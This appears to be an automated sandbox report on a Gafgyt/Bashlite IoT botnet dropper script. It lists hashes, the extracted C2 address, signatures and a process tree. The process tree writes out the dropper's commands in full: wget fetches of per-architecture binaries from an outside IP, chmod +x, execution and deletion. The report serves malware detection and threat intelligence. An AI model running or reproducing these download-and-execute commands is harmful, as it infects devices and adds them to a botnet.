Analysis

  • max time kernel
    32s
  • max time network
    36s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    04-12-2024 02:17

General

  • Target

    2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh

  • Size

    2KB

  • MD5

    8ea1e7d08dd0cf52bbdddc3222e9b8af

  • SHA1

    f031a227d961d83fc0083c4b5b7b4ccdfe64e711

  • SHA256

    2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469

  • SHA512

    1be9d8a04c9b95e9e07c6fad4ae90a160219b05d0bf4b77578ac7dee91b5f336688ac792aab88cc78b5923963e1c9bacf8c0407fc22119041e9def0f217800da

Malware Config

Extracted

Family

gafgyt

C2

192.3.179.33:23

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Gafgyt family
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
    /tmp/2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469.sh
    1⤵
      PID:698
      • /usr/bin/wget
        wget http://192.3.179.33/m-i.p-s.SNOOPY
        2⤵
          PID:707
        • /bin/chmod
          chmod +x m-i.p-s.SNOOPY
          2⤵
          • File and Directory Permissions Modification
          PID:718
        • /tmp/m-i.p-s.SNOOPY
          ./m-i.p-s.SNOOPY
          2⤵
            PID:721
          • /bin/rm
            rm -rf m-i.p-s.SNOOPY
            2⤵
              PID:722
            • /usr/bin/wget
              wget http://192.3.179.33/m-p.s-l.SNOOPY
              2⤵
                PID:724
              • /bin/chmod
                chmod +x m-p.s-l.SNOOPY
                2⤵
                • File and Directory Permissions Modification
                PID:729
              • /tmp/m-p.s-l.SNOOPY
                ./m-p.s-l.SNOOPY
                2⤵
                  PID:730
                • /bin/rm
                  rm -rf m-p.s-l.SNOOPY
                  2⤵
                    PID:732
                  • /usr/bin/wget
                    wget http://192.3.179.33/s-h.4-.SNOOPY
                    2⤵
                      PID:733
                    • /bin/chmod
                      chmod +x s-h.4-.SNOOPY
                      2⤵
                      • File and Directory Permissions Modification
                      PID:738
                    • /tmp/s-h.4-.SNOOPY
                      ./s-h.4-.SNOOPY
                      2⤵
                        PID:739
                      • /bin/rm
                        rm -rf s-h.4-.SNOOPY
                        2⤵
                          PID:740
                        • /usr/bin/wget
                          wget http://192.3.179.33/x-8.6-.SNOOPY
                          2⤵
                            PID:741
                          • /bin/chmod
                            chmod +x x-8.6-.SNOOPY
                            2⤵
                            • File and Directory Permissions Modification
                            PID:743
                          • /tmp/x-8.6-.SNOOPY
                            ./x-8.6-.SNOOPY
                            2⤵
                              PID:744
                            • /bin/rm
                              rm -rf x-8.6-.SNOOPY
                              2⤵
                                PID:745
                              • /usr/bin/wget
                                wget http://192.3.179.33/a-r.m-6.SNOOPY
                                2⤵
                                • Writes file to tmp directory
                                PID:746
                              • /bin/chmod
                                chmod +x a-r.m-6.SNOOPY
                                2⤵
                                • File and Directory Permissions Modification
                                PID:747
                              • /tmp/a-r.m-6.SNOOPY
                                ./a-r.m-6.SNOOPY
                                2⤵
                                • Executes dropped EXE
                                PID:748
                              • /bin/rm
                                rm -rf a-r.m-6.SNOOPY
                                2⤵
                                  PID:750
                                • /usr/bin/wget
                                  wget http://192.3.179.33/x-3.2-.SNOOPY
                                  2⤵
                                    PID:751
                                  • /bin/chmod
                                    chmod +x x-3.2-.SNOOPY
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:752
                                  • /tmp/x-3.2-.SNOOPY
                                    ./x-3.2-.SNOOPY
                                    2⤵
                                      PID:753
                                    • /bin/rm
                                      rm -rf x-3.2-.SNOOPY
                                      2⤵
                                        PID:754
                                      • /usr/bin/wget
                                        wget http://192.3.179.33/a-r.m-7.SNOOPY
                                        2⤵
                                          PID:755
                                        • /bin/chmod
                                          chmod +x a-r.m-7.SNOOPY
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:756
                                        • /tmp/a-r.m-7.SNOOPY
                                          ./a-r.m-7.SNOOPY
                                          2⤵
                                            PID:757
                                          • /bin/rm
                                            rm -rf a-r.m-7.SNOOPY
                                            2⤵
                                              PID:758
                                            • /usr/bin/wget
                                              wget http://192.3.179.33/p-p.c-.SNOOPY
                                              2⤵
                                                PID:759
                                              • /bin/chmod
                                                chmod +x p-p.c-.SNOOPY
                                                2⤵
                                                • File and Directory Permissions Modification
                                                PID:760
                                              • /tmp/p-p.c-.SNOOPY
                                                ./p-p.c-.SNOOPY
                                                2⤵
                                                  PID:761
                                                • /bin/rm
                                                  rm -rf p-p.c-.SNOOPY
                                                  2⤵
                                                    PID:762
                                                  • /usr/bin/wget
                                                    wget http://192.3.179.33/i-5.8-6.SNOOPY
                                                    2⤵
                                                      PID:763
                                                    • /bin/chmod
                                                      chmod +x i-5.8-6.SNOOPY
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:764
                                                    • /tmp/i-5.8-6.SNOOPY
                                                      ./i-5.8-6.SNOOPY
                                                      2⤵
                                                        PID:765
                                                      • /bin/rm
                                                        rm -rf i-5.8-6.SNOOPY
                                                        2⤵
                                                          PID:766
                                                        • /usr/bin/wget
                                                          wget http://192.3.179.33/m-6.8-k.SNOOPY
                                                          2⤵
                                                            PID:767
                                                          • /bin/chmod
                                                            chmod +x m-6.8-k.SNOOPY
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:768
                                                          • /tmp/m-6.8-k.SNOOPY
                                                            ./m-6.8-k.SNOOPY
                                                            2⤵
                                                              PID:769
                                                            • /bin/rm
                                                              rm -rf m-6.8-k.SNOOPY
                                                              2⤵
                                                                PID:770
                                                              • /usr/bin/wget
                                                                wget http://192.3.179.33/p-p.c-.SNOOPY
                                                                2⤵
                                                                  PID:771
                                                                • /bin/chmod
                                                                  chmod +x p-p.c-.SNOOPY
                                                                  2⤵
                                                                  • File and Directory Permissions Modification
                                                                  PID:772
                                                                • /tmp/p-p.c-.SNOOPY
                                                                  ./p-p.c-.SNOOPY
                                                                  2⤵
                                                                    PID:773
                                                                  • /bin/rm
                                                                    rm -rf p-p.c-.SNOOPY
                                                                    2⤵
                                                                      PID:774
                                                                    • /usr/bin/wget
                                                                      wget http://192.3.179.33/a-r.m-4.SNOOPY
                                                                      2⤵
                                                                        PID:775
                                                                      • /bin/chmod
                                                                        chmod +x a-r.m-4.SNOOPY
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:776
                                                                      • /tmp/a-r.m-4.SNOOPY
                                                                        ./a-r.m-4.SNOOPY
                                                                        2⤵
                                                                          PID:777
                                                                        • /bin/rm
                                                                          rm -rf a-r.m-4.SNOOPY
                                                                          2⤵
                                                                            PID:781
                                                                          • /usr/bin/wget
                                                                            wget http://192.3.179.33/a-r.m-5.SNOOPY
                                                                            2⤵
                                                                              PID:782
                                                                            • /bin/chmod
                                                                              chmod +x a-r.m-5.SNOOPY
                                                                              2⤵
                                                                              • File and Directory Permissions Modification
                                                                              PID:787
                                                                            • /tmp/a-r.m-5.SNOOPY
                                                                              ./a-r.m-5.SNOOPY
                                                                              2⤵
                                                                                PID:788
                                                                              • /bin/rm
                                                                                rm -rf a-r.m-5.SNOOPY
                                                                                2⤵
                                                                                  PID:790

                                                                              Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • /tmp/a-r.m-6.SNOOPY

                                                                                Filesize

                                                                                108KB

                                                                                MD5

                                                                                d99e614a76b1b6b63030556a22cf2881

                                                                                SHA1

                                                                                1cc0cc981f07d648722bc0b112da2d697858558f

                                                                                SHA256

                                                                                6bcf634cf08615de9c4f5759bcc2523b114db64a67ed3c119c7aa4230be0b0b5

                                                                                SHA512

                                                                                19585dae9db8f913f809da6644127b064b03ec2156fe482b87feb803c8facb291da0b951336c7bc13cef6af1a032229f8f18511b09531a2ad3dce4f53bb8051f